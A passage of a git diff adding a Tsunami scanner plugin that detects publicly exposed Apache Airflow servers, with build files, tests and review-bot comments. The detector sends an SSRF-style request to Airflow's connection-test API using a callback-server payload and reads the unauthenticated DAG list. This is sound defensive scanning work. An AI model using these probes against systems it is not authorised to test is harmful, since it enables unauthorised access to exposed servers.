"com.google.truth.extensions:truth-proto-extension:${truthVersion}" +} diff --git a/community/detectors/apache_airflow_exposed_ui/gradle/wrapper/gradle-wrapper.jar b/community/detectors/apache_airflow_exposed_ui/gradle/wrapper/gradle-wrapper.jar new file mode 100644 index 000000000..2c3521197 Binary files /dev/null and b/community/detectors/apache_airflow_exposed_ui/gradle/wrapper/gradle-wrapper.jar differ diff --git a/community/detectors/apache_airflow_exposed_ui/gradle/wrapper/gradle-wrapper.properties b/community/detectors/apache_airflow_exposed_ui/gradle/wrapper/gradle-wrapper.properties new file mode 100644 index 000000000..d04736436 --- /dev/null +++ b/community/detectors/apache_airflow_exposed_ui/gradle/wrapper/gradle-wrapper.properties @@ -0,0 +1,7 @@ +distributionBase=GRADLE_USER_HOME +distributionPath=wrapper/dists +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true +zipStoreBase=GRADLE_USER_HOME +zipStorePath=wrapper/dists diff --git a/community/detectors/apache_airflow_exposed_ui/gradlew b/community/detectors/apache_airflow_exposed_ui/gradlew new file mode 100755 index 000000000..f5feea6d6 --- /dev/null +++ b/community/detectors/apache_airflow_exposed_ui/gradlew 
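Review bot: `tsunamiVersion = 'latest.release'` is a dynamic version, so the three `com.google.tsunami` artifacts resolve to whatever is newest at build time and the plugin jar is not reproducible. Pin it, e.g. `tsunamiVersion = '<pinned-tsunami-version>'` (placeholder), and consider dependency locking or verification for the build. `mavenLocal()` in `repositories` can let an artifact from the builder's local cache satisfy a dependency, and `'Built-By': System.getProperty('user.name')` writes the builder's account name into the jar manifest; both are worth dropping for release builds. `jsoupVersion = '1.9.2'` is an old release and should be checked against current advisories before it ships.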
@@ -0,0 +1,252 @@ +#!/bin/sh + +# +# Copyright © 2015-2021 the original authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 +# + +############################################################################## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. 
+# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/platforms/jvm/plugins-application/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# +############################################################################## + +# Attempt to set APP_HOME + +# Resolve links: $0 may be a link +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac +done + +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd -P "${APP_HOME:-./}" > /dev/null && printf '%s +' "$PWD" ) || exit + +# Use the maximum available, or set MAX_FD != -1 to use that value. +MAX_FD=maximum + +warn () { + echo "$*" +} >&2 + +die () { + echo + echo "$*" + echo + exit 1 +} >&2 + +# OS specific support (must be 'true' or 'false'). +cygwin=false +msys=false +darwin=false +nonstop=false +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; +esac + +CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar + + +# Determine the Java command to use to start the JVM. 
+if [ -n "$JAVA_HOME" ] ; then + if [ -x "$JAVA_HOME/jre/sh/java" ] ; then + # IBM's JDK on AIX uses strange locations for the executables + JAVACMD=$JAVA_HOME/jre/sh/java + else + JAVACMD=$JAVA_HOME/bin/java + fi + if [ ! -x "$JAVACMD" ] ; then + die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +else + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +fi + +# Increase the maximum file descriptors if we can. +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac +fi + +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. 
+ +# For Cygwin or MSYS, switch paths to Windows format before running java +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + + # Now convert the arguments - kludge to limit ourselves to /bin/sh + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) + fi + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg + done +fi + + +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. 
+# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' + +exec "$JAVACMD" "$@" diff --git a/community/detectors/apache_airflow_exposed_ui/gradlew.bat b/community/detectors/apache_airflow_exposed_ui/gradlew.bat new file mode 100644 index 000000000..9d21a2183 --- /dev/null +++ b/community/detectors/apache_airflow_exposed_ui/gradlew.bat 
@@ -0,0 +1,94 @@ +@rem +@rem Copyright 2015 the original author or authors. +@rem +@rem Licensed under the Apache License, Version 2.0 (the "License"); +@rem you may not use this file except in compliance with the License. +@rem You may obtain a copy of the License at +@rem +@rem https://www.apache.org/licenses/LICENSE-2.0 +@rem +@rem Unless required by applicable law or agreed to in writing, software +@rem distributed under the License is distributed on an "AS IS" BASIS, +@rem WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +@rem See the License for the specific language governing permissions and +@rem limitations under the License. +@rem +@rem SPDX-License-Identifier: Apache-2.0 +@rem + +@if "%DEBUG%"=="" @echo off +@rem ########################################################################## +@rem +@rem Gradle startup script for Windows +@rem +@rem ########################################################################## + +@rem Set local scope for the variables with windows NT shell +if "%OS%"=="Windows_NT" setlocal + +set DIRNAME=%~dp0 +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused +set APP_BASE_NAME=%~n0 +set APP_HOME=%DIRNAME% + +@rem Resolve any "." and ".." in APP_HOME to make it shorter. +for %%i in ("%APP_HOME%") do set APP_HOME=%%~fi + +@rem Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +set DEFAULT_JVM_OPTS="-Xmx64m" "-Xms64m" + +@rem Find java.exe +if defined JAVA_HOME goto findJavaFromJavaHome + +set JAVA_EXE=java.exe +%JAVA_EXE% -version >NUL 2>&1 +if %ERRORLEVEL% equ 0 goto execute + +echo. 1>&2 +echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. 1>&2 +echo. 1>&2 +echo Please set the JAVA_HOME variable in your environment to match the 1>&2 +echo location of your Java installation. 
1>&2 + +goto fail + +:findJavaFromJavaHome +set JAVA_HOME=%JAVA_HOME:"=% +set JAVA_EXE=%JAVA_HOME%/bin/java.exe + +if exist "%JAVA_EXE%" goto execute + +echo. 1>&2 +echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% 1>&2 +echo. 1>&2 +echo Please set the JAVA_HOME variable in your environment to match the 1>&2 +echo location of your Java installation. 1>&2 + +goto fail + +:execute +@rem Setup the command line + +set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar + + +@rem Execute Gradle +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* + +:end +@rem End local scope for the variables with windows NT shell +if %ERRORLEVEL% equ 0 goto mainEnd + +:fail +rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of +rem the _cmd.exe /c_ return code! +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% + +:mainEnd +if "%OS%"=="Windows_NT" endlocal + +:omega diff --git a/community/detectors/apache_airflow_exposed_ui/settings.gradle b/community/detectors/apache_airflow_exposed_ui/settings.gradle new file mode 100644 index 000000000..a76b2099c --- /dev/null +++ b/community/detectors/apache_airflow_exposed_ui/settings.gradle @@ -0,0 +1 @@ +rootProject.name = 'exposedairflowserver' diff --git a/community/detectors/apache_airflow_exposed_ui/src/main/java/com/google/tsunami/plugins/exposedui/ExposedAirflowServerDetector.java b/community/detectors/apache_airflow_exposed_ui/src/main/java/com/google/tsunami/plugins/exposedui/ExposedAirflowServerDetector.java new file mode 100644 index 000000000..704ed8887 --- /dev/null +++ b/community/detectors/apache_airflow_exposed_ui/src/main/java/com/google/tsunami/plugins/exposedui/ExposedAirflowServerDetector.java 
@@ -0,0 +1,246 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package com.google.tsunami.plugins.exposedui; + +import static com.google.common.base.Preconditions.checkNotNull; +import static com.google.tsunami.common.net.http.HttpRequest.get; +import static com.google.tsunami.common.net.http.HttpRequest.post; + +import com.google.common.collect.ImmutableList; +import com.google.common.flogger.GoogleLogger; +import com.google.common.util.concurrent.Uninterruptibles; +import com.google.gson.JsonObject; +import com.google.gson.JsonParser; +import com.google.gson.JsonSyntaxException; +import com.google.protobuf.ByteString; +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.common.data.NetworkEndpointUtils; +import com.google.tsunami.common.data.NetworkServiceUtils; +import com.google.tsunami.common.net.http.HttpClient; +import com.google.tsunami.common.net.http.HttpHeaders; +import com.google.tsunami.common.net.http.HttpResponse; +import com.google.tsunami.common.net.http.HttpStatus; +import com.google.tsunami.common.time.UtcClock; +import com.google.tsunami.plugin.PluginType; +import com.google.tsunami.plugin.VulnDetector; +import com.google.tsunami.plugin.annotations.ForWebService; +import com.google.tsunami.plugin.annotations.PluginInfo; +import com.google.tsunami.plugin.payload.NotImplementedException; +import com.google.tsunami.plugin.payload.Payload; +import 
com.google.tsunami.plugin.payload.PayloadGenerator; +import com.google.tsunami.proto.DetectionReport; +import com.google.tsunami.proto.DetectionReportList; +import com.google.tsunami.proto.DetectionReportList.Builder; +import com.google.tsunami.proto.DetectionStatus; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.PayloadGeneratorConfig; +import com.google.tsunami.proto.Severity; +import com.google.tsunami.proto.TargetInfo; +import com.google.tsunami.proto.Vulnerability; +import com.google.tsunami.proto.VulnerabilityId; +import java.io.IOException; +import java.time.Clock; +import java.time.Duration; +import java.time.Instant; +import java.util.Objects; +import java.util.regex.Matcher; +import java.util.regex.Pattern; +import javax.inject.Inject; +import org.jsoup.Jsoup; +import org.jsoup.nodes.Document; +import org.jsoup.nodes.Element; + +/** A VulnDetector plugin for Exposed Apache Airflow Server. */ +@PluginInfo( + type = PluginType.VULN_DETECTION, + name = "Exposed Apache Airflow Server Detector", + version = "0.1", + description = + "This detector checks for occurrences of exposed apache airflow server installations.", + author = "am0o0", + bootstrapModule = ExposedAirflowServerDetectorModule.class) +@ForWebService +public final class ExposedAirflowServerDetector implements VulnDetector { + private static final GoogleLogger logger = GoogleLogger.forEnclosingClass(); + + private final Clock utcClock; + private final HttpClient httpClient; + private final PayloadGenerator payloadGenerator; + + @Inject + ExposedAirflowServerDetector( + @UtcClock Clock utcClock, HttpClient httpClient, PayloadGenerator payloadGenerator) { + this.utcClock = checkNotNull(utcClock); + this.httpClient = checkNotNull(httpClient).modify().setFollowRedirects(true).build(); + this.payloadGenerator = checkNotNull(payloadGenerator); + } + + @Override + public DetectionReportList detect( + TargetInfo targetInfo, ImmutableList matchedServices) { + + Builder 
detectionReport = DetectionReportList.newBuilder(); + matchedServices.stream() + .filter(NetworkServiceUtils::isWebService) + .filter(this::isApacheAirflow) + .forEach( + networkService -> { + if (isServiceVulnerableCheckOutOfBandCallback(networkService)) { + detectionReport.addDetectionReports( + buildDetectionReport( + targetInfo, + networkService, + "Apache Airflow Server is misconfigured and can be accessed publicly," + + " Tsunami security scanner confirmed this by sending an HTTP request" + + " with test connection API and receiving the corresponding callback" + + " on tsunami callback server", + Severity.CRITICAL)); + } else if (isServiceVulnerableCheckResponse(networkService)) { + detectionReport.addDetectionReports( + buildDetectionReport( + targetInfo, + networkService, + "Apache Airflow Server is misconfigured and can be accessed " + + "publicly, We confirmed this by checking API endpoint and matching " + + "the responses with our pattern", + Severity.HIGH)); + } + }); + return detectionReport.build(); + } + + public boolean isApacheAirflow(NetworkService networkService) { + logger.atInfo().log("probing apache airflow login page - custom fingerprint phase"); + + var uriAuthority = NetworkEndpointUtils.toUriAuthority(networkService.getNetworkEndpoint()); + var loginPageUrl = String.format("http://%s/%s", uriAuthority, "login"); + try { + HttpResponse loginResponse = + this.httpClient.send(get(loginPageUrl).withEmptyHeaders().build()); + if (!(loginResponse.status() == HttpStatus.OK && loginResponse.bodyString().isPresent())) { + return false; + } + Document doc = Jsoup.parse(loginResponse.bodyString().get()); + if (!Objects.equals(doc.title(), "Sign In - Airflow")) { + return false; + } + for (Element anchor : doc.getElementsByTag("a")) { + if (anchor.attr("href").equals("https://airflow.apache.org") + && Objects.equals(anchor.text(), "Airflow Website")) { + return true; + } + } + } catch (IOException e) { + logger.atWarning().withCause(e).log("Unable to 
query '%s'.", loginPageUrl); + } + return false; + } + + private boolean isServiceVulnerableCheckOutOfBandCallback(NetworkService networkService) { + var payload = getTsunamiCallbackHttpPayload(); + if (payload == null || !payload.getPayloadAttributes().getUsesCallbackServer()) { + logger.atWarning().log("Tsunami callback server is not setup for this environment."); + return false; + } + + String rootUrl = NetworkServiceUtils.buildWebApplicationRootUrl(networkService); + try { + String payloadString = payload.getPayload(); + String payloadWithoutProtocol; + // I noticed that there are two types of SSRF payload, one the payload exists as a + // subdomain and other exists as an http path + if (payloadString.contains("http://") || payloadString.contains("https://")) { + Matcher m = Pattern.compile("https?://(.*)").matcher(payloadString); + if (!m.find()) { + return false; + } + payloadWithoutProtocol = m.group(1); + } else { + payloadWithoutProtocol = payloadString; + } + String body = + "{\"connection_id\":\"tsunami\",\"conn_type\":\"http\",\"host\":\"SSRF_PAYLOAD\",\"extra\":\"{}\"}" + .replace("SSRF_PAYLOAD", payloadWithoutProtocol); + this.httpClient.send( + post(rootUrl + "api/v1/connections/test") + .setHeaders( + HttpHeaders.builder().addHeader("Content-Type", "application/json").build()) + .setRequestBody(ByteString.copyFromUtf8(body)) + .build(), + networkService); + + Uninterruptibles.sleepUninterruptibly(Duration.ofSeconds(2)); + return payload.checkIfExecuted(); + } catch (IOException | RuntimeException e) { + logger.atWarning().withCause(e).log("Failed to send request."); + return false; + } + } + + private boolean isServiceVulnerableCheckResponse(NetworkService networkService) { + String rootUrl = NetworkServiceUtils.buildWebApplicationRootUrl(networkService); + try { + HttpResponse dags = + this.httpClient.send( + get(rootUrl + "api/v1/dags").withEmptyHeaders().build(), networkService); + if (dags.bodyString().isEmpty()) { + return false; + } + 
JsonObject response = JsonParser.parseString(dags.bodyString().get()).getAsJsonObject(); + return response.has("total_entries") && response.has("dags"); + } catch (IllegalStateException | IOException | JsonSyntaxException e) { + return false; + } + } + + private Payload getTsunamiCallbackHttpPayload() { + try { + return this.payloadGenerator.generate( + PayloadGeneratorConfig.newBuilder() + .setVulnerabilityType(PayloadGeneratorConfig.VulnerabilityType.SSRF) + .setInterpretationEnvironment( + PayloadGeneratorConfig.InterpretationEnvironment.INTERPRETATION_ANY) + .setExecutionEnvironment(PayloadGeneratorConfig.ExecutionEnvironment.EXEC_ANY) + .build()); + } catch (NotImplementedException n) { + return null; + } + } + + private DetectionReport buildDetectionReport( + TargetInfo targetInfo, + NetworkService vulnerableNetworkService, + String description, + Severity severity) { + return DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(vulnerableNetworkService) + .setDetectionTimestamp(Timestamps.fromMillis(Instant.now(utcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("TSUNAMI_COMMUNITY") + .setValue("APACHE_AIRFLOW_SERVER_EXPOSED")) + .setSeverity(severity) + .setTitle("Exposed Apache Airflow Server") + .setDescription(description) + .setRecommendation("Please disable public access to your apache airflow instance.")) + .build(); + } +} 
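Review bot: `isApacheAirflow` builds its probe with `String.format("http://%s/%s", uriAuthority, "login")`, while both vulnerability checks below it use `NetworkServiceUtils.buildWebApplicationRootUrl(networkService)`. Because the fingerprint is the `.filter(this::isApacheAirflow)` gate in `detect`, an Airflow instance served only over TLS or under a non-root application path would probably be dropped before either check runs, which is a silent false negative. Build the URL the same way, `var loginPageUrl = NetworkServiceUtils.buildWebApplicationRootUrl(networkService) + "login";`, and pass `networkService` to `httpClient.send(...)` as the other two calls do. It would also help triage to log the exception that `isServiceVulnerableCheckResponse` currently swallows in its `catch` block.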
diff --git a/community/detectors/mlflow_cve_2023_1177/src/main/java/com/google/tsunami/plugins/detectors/cves/cve20231177/Cve20231177DetectorBootstrapModule.java b/community/detectors/apache_airflow_exposed_ui/src/main/java/com/google/tsunami/plugins/exposedui/ExposedAirflowServerDetectorModule.java similarity index 70% rename from community/detectors/mlflow_cve_2023_1177/src/main/java/com/google/tsunami/plugins/detectors/cves/cve20231177/Cve20231177DetectorBootstrapModule.java rename to community/detectors/apache_airflow_exposed_ui/src/main/java/com/google/tsunami/plugins/exposedui/ExposedAirflowServerDetectorModule.java index 4eb306381..321d2ac47 100644 --- a/community/detectors/mlflow_cve_2023_1177/src/main/java/com/google/tsunami/plugins/detectors/cves/cve20231177/Cve20231177DetectorBootstrapModule.java +++ b/community/detectors/apache_airflow_exposed_ui/src/main/java/com/google/tsunami/plugins/exposedui/ExposedAirflowServerDetectorModule.java @@ -1,5 +1,5 @@ /* - * Copyright 2021 Google LLC + * Copyright 2024 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. 
@@ -13,15 +13,15 @@ * See the License for the specific language governing permissions and * limitations under the License. */ -package com.google.tsunami.plugins.detectors.cves.cve20231177; -import com.google.tsunami.plugin.PluginBootstrapModule; +package com.google.tsunami.plugins.exposedui; -/** An CVE-2023-1177 Guice module that bootstraps the {@link Cve20231177Detector}. */ -public final class Cve20231177DetectorBootstrapModule extends PluginBootstrapModule { +import com.google.tsunami.plugin.PluginBootstrapModule; +/** A module registering the detector for Exposed Airflow Server. */ +public final class ExposedAirflowServerDetectorModule extends PluginBootstrapModule { @Override protected void configurePlugin() { - registerPlugin(Cve20231177Detector.class); + registerPlugin(ExposedAirflowServerDetector.class); } } diff --git a/community/detectors/apache_airflow_exposed_ui/src/test/java/com/google/tsunami/plugins/exposedui/ExposedAirflowServerDetectorTest.java b/community/detectors/apache_airflow_exposed_ui/src/test/java/com/google/tsunami/plugins/exposedui/ExposedAirflowServerDetectorTest.java new file mode 100644 index 000000000..11ab9ed4f --- /dev/null +++ b/community/detectors/apache_airflow_exposed_ui/src/test/java/com/google/tsunami/plugins/exposedui/ExposedAirflowServerDetectorTest.java 
@@ -0,0 +1,264 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package com.google.tsunami.plugins.exposedui; + +import static com.google.common.truth.extensions.proto.ProtoTruth.assertThat; +import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostnameAndPort; + +import com.google.common.collect.ImmutableList; +import com.google.common.truth.Truth; +import com.google.inject.Guice; +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.common.net.http.HttpClientModule; +import com.google.tsunami.common.time.testing.FakeUtcClock; +import com.google.tsunami.common.time.testing.FakeUtcClockModule; +import com.google.tsunami.plugin.payload.testing.FakePayloadGeneratorModule; +import com.google.tsunami.plugin.payload.testing.PayloadTestHelper; +import com.google.tsunami.proto.DetectionReport; +import com.google.tsunami.proto.DetectionReportList; +import com.google.tsunami.proto.DetectionStatus; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.Severity; +import com.google.tsunami.proto.TargetInfo; +import com.google.tsunami.proto.Vulnerability; +import com.google.tsunami.proto.VulnerabilityId; +import java.io.IOException; +import java.time.Instant; +import javax.inject.Inject; +import okhttp3.mockwebserver.Dispatcher; +import okhttp3.mockwebserver.MockResponse; +import okhttp3.mockwebserver.MockWebServer; +import okhttp3.mockwebserver.RecordedRequest; 
+import org.junit.After; +import org.junit.Before; +import org.junit.Test; +import org.junit.runner.RunWith; +import org.junit.runners.JUnit4; + +/** Unit tests for the {@link ExposedAirflowServerDetector}. */ +@RunWith(JUnit4.class) +public final class ExposedAirflowServerDetectorTest { + private final MockWebServer mockTargetService = new MockWebServer(); + private final MockWebServer mockCallbackServer = new MockWebServer(); + private final FakeUtcClock fakeUtcClock = + FakeUtcClock.create().setNow(Instant.parse("2020-01-01T00:00:00.00Z")); + + @Inject private ExposedAirflowServerDetector detector; + + private void createInjector() { + Guice.createInjector( + new FakeUtcClockModule(fakeUtcClock), + new HttpClientModule.Builder().build(), + FakePayloadGeneratorModule.builder().setCallbackServer(mockCallbackServer).build(), + new ExposedAirflowServerDetectorModule()) + .injectMembers(this); + } + + @Before + public void setUp() throws IOException { + mockCallbackServer.start(); + } + + @After + public void tearDown() throws Exception { + mockTargetService.shutdown(); + mockCallbackServer.shutdown(); + } + + @Test + public void detect_withCallbackServer_onVulnerableTarget_returnsVulnerability() + throws IOException { + startMockWebServer(); + createInjector(); + mockCallbackServer.enqueue(PayloadTestHelper.generateMockSuccessfulCallbackResponse()); + NetworkService targetNetworkService = + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockTargetService.getHostName(), mockTargetService.getPort())) + .addSupportedHttpMethods("POST") + .build(); + TargetInfo targetInfo = + TargetInfo.newBuilder() + .addNetworkEndpoints(targetNetworkService.getNetworkEndpoint()) + .build(); + + DetectionReportList detectionReports = + detector.detect(targetInfo, ImmutableList.of(targetNetworkService)); + + Truth.assertThat(mockCallbackServer.getRequestCount()).isEqualTo(1); + Truth.assertThat(mockTargetService.getRequestCount()).isEqualTo(2); + 
assertThat(detectionReports.getDetectionReportsList()) + .comparingExpectedFieldsOnly() + .containsExactly( + DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(targetNetworkService) + .setDetectionTimestamp( + Timestamps.fromMillis(Instant.now(fakeUtcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("TSUNAMI_COMMUNITY") + .setValue("APACHE_AIRFLOW_SERVER_EXPOSED")) + .setSeverity(Severity.CRITICAL) + .setTitle("Exposed Apache Airflow Server") + .setDescription( + "Apache Airflow Server is misconfigured and can be accessed publicly," + + " Tsunami security scanner confirmed this by sending an HTTP" + + " request with test connection API and receiving the" + + " corresponding callback on tsunami callback server") + .setRecommendation( + "Please disable public access to your apache airflow instance.")) + .build()); + } + + @Test + public void detect_withCallbackServer_butNoCallback_returnsEmpty() throws IOException { + mockTargetService.enqueue(new MockResponse().setResponseCode(400)); + mockTargetService.enqueue(new MockResponse().setResponseCode(400)); + mockTargetService.enqueue(new MockResponse().setResponseCode(400)); + mockTargetService.start(); + createInjector(); + mockCallbackServer.enqueue(PayloadTestHelper.generateMockUnsuccessfulCallbackResponse()); + NetworkService targetNetworkService = + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockTargetService.getHostName(), mockTargetService.getPort())) + .addSupportedHttpMethods("POST") + .build(); + TargetInfo targetInfo = + TargetInfo.newBuilder() + .addNetworkEndpoints(targetNetworkService.getNetworkEndpoint()) + .build(); + + DetectionReportList detectionReports = + detector.detect(targetInfo, ImmutableList.of(targetNetworkService)); + + assertThat(detectionReports.getDetectionReportsList()).isEmpty(); + } + 
+ @Test + public void detect_no_airflow_webservice_returnsEmpty() throws IOException { + mockTargetService.enqueue(new MockResponse().setResponseCode(400)); + mockTargetService.start(); + createInjector(); + mockCallbackServer.enqueue(PayloadTestHelper.generateMockUnsuccessfulCallbackResponse()); + NetworkService targetNetworkService = + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockTargetService.getHostName(), mockTargetService.getPort())) + .addSupportedHttpMethods("POST") + .addSupportedHttpMethods("GET") + .build(); + TargetInfo targetInfo = + TargetInfo.newBuilder() + .addNetworkEndpoints(targetNetworkService.getNetworkEndpoint()) + .build(); + + DetectionReportList detectionReports = + detector.detect(targetInfo, ImmutableList.of(targetNetworkService)); + + assertThat(detectionReports.getDetectionReportsList()).isEmpty(); + } + + @Test + public void detect_withResponseMatching_insteadof_withoutCallbackServer() throws IOException { + startMockWebServer(); + createInjector(); + mockCallbackServer.enqueue(PayloadTestHelper.generateMockUnsuccessfulCallbackResponse()); + NetworkService targetNetworkService = + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockTargetService.getHostName(), mockTargetService.getPort())) + .addSupportedHttpMethods("POST") + .build(); + TargetInfo targetInfo = + TargetInfo.newBuilder() + 